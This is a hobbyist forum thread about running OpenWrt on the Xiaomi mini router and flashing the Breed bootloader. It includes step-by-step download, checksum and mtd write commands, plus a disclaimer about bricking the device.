You're welcome! I had to unpack the firmware and look through the Lua code until I found a crack wink

Hey there, I have a Xiaomi mini router also. I post to let you know about a problem (with my IP cam (the Yi IP cam normal edition) and my PC) I've encountered with OpenWrt 15.05/trunk:

https://forum.openwrt.org/viewtopic.php?id=61567

If someone encounters the same issue, maybe it can help.

(Last edited by xiaxia on 18 Dec 2015, 09:38)

Compiled r47929 and running without problems. Switch detected as usual.

I tried the original FW v2.6.17 and it looks like the 5 GHz signal strength is the same as with OpenWrt, so they must have screwed up something too, because it was as strong as the 2.4 GHz with older firmwares.

Another thing: when flashing OpenWrt using santamanno's method you won't easily wget the image if the router is not connected to the internet, unless you run a local server, so I figured you can simply scp the image using SSH.

(Last edited by anarchy99 on 21 Dec 2015, 02:49)

Is the stock firmware U-Boot locked, or can I flash Breed directly?

roger_ wrote:

Is the stock firmware U-Boot locked, or can I flash Breed directly?

It can be flashed directly. From the original description:

刷入方式
跟 U-Boot 相同的刷入方法:

  • 从 PandoraBox U-Boot 中刷入

  • 在固件中使用 mtd 命令刷入

  • 在 U-Boot TTL 中刷入

  • 用编程器刷入

In English:

Flashing Method
The ways to flash are the same as for U-Boot:

  • Flash from PandoraBox's U-Boot

  • From inside the firmware, using the mtd command

  • Using TTL with U-Boot

  • Flash using a [hardware] programming device

PandoraBox U-Boot is another custom bootloader, available here, which would already need to be present first for this method to be available. The latter two methods require extra hardware. I used the second way:

  • cd /tmp

  • wget http://breed.hackpascal.net/latest/bree … i-mini.bin

  • wget http://breed.hackpascal.net/latest/md5sum.txt

  • cat md5sum.txt | fgrep xiaomi

  • md5sum breed-mt7620-xiaomi-mini.bin
    Manually compare the MD5 sums. Only proceed if they match. Otherwise, re-download.

  • cat /proc/mtd
    Find out the bootloader partition. If flashing from the stock firmware, this will be mtd1, named "Bootloader". If flashing from PandoraBox, it'll be mtd0, named "u-boot". Other firmwares might have different variations.

  • mtd write breed-mt7620-xiaomi-mini.bin mtdX
    Where X is the partition number. Not using the -r (automatic reboot) switch gives you a chance to recover if something goes wrong, in which case do not reboot but reflash again, perhaps reverting to the stock bootloader (of which you might want to make a backup beforehand, not covered here).

Disclaimer: Changing the bootloader has the potential to brick your device. While the procedure as described worked for me, it is possible that something might go wrong. Anything you decide to do, you are doing at your own risk.

Note that once you have Breed flashed in, you can flash any other bootloader from inside its Web-based interface.

A little more about Breed:

  • For people who don't like to hold the Reset switch, note that there is a utility that will trigger the bootloader console remotely: with the router powered off and connected to your computer through Ethernet, run the program, press the only button and then power on the router. The message in the program window will change once the bootloader console is active. Download BreedEnter.exe (hover over the file and click on the down arrow), requires the WinPCap library.

  • Apart from the web console, there is also a Telnet interface. List of available commands (in Chinese) or type help.

On an unrelated note, using the method I described above I made some changes to the filesystem inside PandoraBox binary image, making it basically like the vanilla OpenWrt (removing China-specific stuff, translations, not widely-used packages, reverting most of the interface changes to the OpenWrt defaults; basically making it more or less like the stock OpenWrt with their WiFi optimizations while keeping the more useful packages that were already installed). I can share the process, patch set and perhaps the result: if anyone is interested, let me know (otherwise I wouldn't want to clog up the forum).

Shared now, get it here if interested.

(Last edited by StrangeOrange on 8 Jan 2016, 15:44)